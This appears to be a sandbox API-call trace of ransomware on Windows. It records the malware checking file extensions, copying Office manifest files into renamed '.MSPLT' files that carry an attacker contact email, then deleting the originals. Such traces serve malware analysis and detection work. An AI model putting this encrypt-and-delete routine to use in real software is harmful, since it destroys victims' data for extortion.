[0182.884] lstrlenW (lpString=".docx") returned 5 [0182.884] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.884] lstrlenW (lpString=".pdf") returned 4 [0182.884] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString=".xls") returned 4 [0182.884] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString=".xlsx") returned 5 [0182.884] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.884] lstrlenW (lpString=".ppt") returned 4 [0182.884] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.884] lstrlenW (lpString=".zip") returned 4 [0182.884] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.884] lstrlenW (lpString=".rar") returned 4 [0182.884] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.884] lstrlenW (lpString=".bz2") returned 4 [0182.884] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.885] lstrlenW (lpString=".7z") returned 3 [0182.885] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.885] lstrlenW (lpString=".dbf") returned 4 [0182.885] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.885] lstrlenW (lpString=".1cd") returned 4 [0182.885] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0182.885] lstrlenW (lpString=".jpg") returned 4 [0182.885] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.885] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.885] lstrlenW (lpString="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 53 [0182.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.886] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1261) returned 1 [0182.886] CloseHandle (hObject=0x354) returned 1 [0182.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0182.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.886] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.886] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.887] GetLastError () returned 0x0 [0182.887] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0182.891] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0182.893] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.893] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.893] SetEndOfFile (hFile=0x374) returned 1 [0182.893] CloseHandle (hObject=0x374) returned 1 [0182.896] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.896] SetEndOfFile (hFile=0x354) returned 1 [0182.897] CloseHandle (hObject=0x354) returned 1 [0182.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 1 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.898] lstrlenW (lpString=".doc") returned 4 [0182.898] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.898] lstrlenW (lpString=".docx") returned 5 [0182.898] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.898] lstrlenW (lpString=".pdf") returned 4 [0182.898] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.898] lstrlenW (lpString=".xls") returned 4 [0182.898] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString=".xlsx") returned 5 [0182.899] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.899] lstrlenW (lpString=".ppt") returned 4 [0182.899] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.899] lstrlenW (lpString=".zip") returned 4 [0182.899] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.899] lstrlenW (lpString=".rar") returned 4 [0182.899] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString=".bz2") returned 4 [0182.899] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString=".7z") returned 3 [0182.899] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.899] lstrlenW (lpString=".dbf") returned 4 [0182.899] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.899] lstrlenW (lpString=".1cd") returned 4 [0182.899] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.899] lstrlenW (lpString=".jpg") returned 4 [0182.899] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.900] lstrlenW (lpString=".doc") returned 4 [0182.900] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.900] lstrlenW (lpString=".docx") returned 5 [0182.901] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.901] lstrlenW (lpString=".pdf") returned 4 [0182.901] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString=".xls") returned 4 [0182.901] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString=".xlsx") returned 5 [0182.901] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.901] lstrlenW (lpString=".ppt") returned 4 [0182.901] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.901] lstrlenW (lpString=".zip") returned 4 [0182.901] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.901] lstrlenW (lpString=".rar") returned 4 [0182.901] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString=".bz2") returned 4 [0182.901] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString=".7z") returned 3 [0182.901] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.901] lstrlenW (lpString=".dbf") returned 4 [0182.901] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.901] lstrlenW (lpString=".1cd") returned 4 [0182.901] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0182.901] lstrlenW (lpString=".jpg") returned 4 [0182.901] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.902] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.902] lstrlenW (lpString="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 53 [0182.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.904] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=1261) returned 1 [0182.904] CloseHandle (hObject=0x354) returned 1 [0182.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 0x220 [0182.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.904] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.905] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.905] GetLastError () returned 0x0 [0182.905] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0182.907] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0182.908] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.909] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.909] SetEndOfFile (hFile=0x374) returned 1 [0182.909] CloseHandle (hObject=0x374) returned 1 [0182.912] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.912] SetEndOfFile (hFile=0x354) returned 1 [0182.913] CloseHandle (hObject=0x354) returned 1 [0182.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.914] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 1 [0182.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.914] lstrlenW (lpString=".doc") returned 4 [0182.914] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString=".docx") returned 5 [0182.915] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.915] lstrlenW (lpString=".pdf") returned 4 [0182.915] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString=".xls") returned 4 [0182.915] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString=".xlsx") returned 5 [0182.915] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.915] lstrlenW (lpString=".ppt") returned 4 [0182.915] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.915] lstrlenW (lpString=".zip") returned 4 [0182.915] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.915] lstrlenW (lpString=".rar") returned 4 [0182.915] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString=".bz2") returned 4 [0182.915] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString=".7z") returned 3 [0182.915] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.915] lstrlenW (lpString=".dbf") returned 4 [0182.915] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.915] lstrlenW (lpString=".1cd") returned 4 [0182.915] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.915] lstrlenW (lpString=".jpg") returned 4 [0182.916] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.916] lstrlenW (lpString=".doc") returned 4 [0182.916] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString=".docx") returned 5 [0182.916] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.916] lstrlenW (lpString=".pdf") returned 4 [0182.916] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString=".xls") returned 4 [0182.916] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString=".xlsx") returned 5 [0182.916] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.916] lstrlenW (lpString=".ppt") returned 4 [0182.916] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.916] lstrlenW (lpString=".zip") returned 4 [0182.916] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.916] lstrlenW (lpString=".rar") returned 4 [0182.916] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString=".bz2") returned 4 [0182.916] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.916] lstrlenW (lpString=".7z") returned 3 [0182.916] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.916] lstrlenW (lpString=".dbf") returned 4 [0182.917] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.917] lstrlenW (lpString=".1cd") returned 4 [0182.917] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0182.917] lstrlenW (lpString=".jpg") returned 4 [0182.917] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.917] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.917] lstrlenW (lpString="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 53 [0182.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.917] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=9216) returned 1 [0182.918] CloseHandle (hObject=0x354) returned 1 [0182.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 0x220 [0182.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.918] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.918] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0182.919] GetLastError () returned 0x0 [0182.919] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x2400, lpOverlapped=0x0) returned 1 [0183.494] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x2410, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x2410, lpOverlapped=0x0) returned 1 [0183.495] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.495] WriteFile (in: hFile=0x374, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.495] SetEndOfFile (hFile=0x374) returned 1 [0183.495] CloseHandle (hObject=0x374) returned 1 [0183.500] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.500] SetEndOfFile (hFile=0x354) returned 1 [0183.501] CloseHandle (hObject=0x354) returned 1 [0183.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 1 [0183.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.502] lstrlenW (lpString=".doc") returned 4 [0183.502] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.502] lstrlenW (lpString=".docx") returned 5 [0183.502] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.502] lstrlenW (lpString=".pdf") returned 4 [0183.502] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString=".xls") returned 4 [0183.503] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString=".xlsx") returned 5 [0183.503] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.503] lstrlenW (lpString=".ppt") returned 4 [0183.503] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0183.503] lstrlenW (lpString=".zip") returned 4 [0183.503] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.503] lstrlenW (lpString=".rar") returned 4 [0183.503] 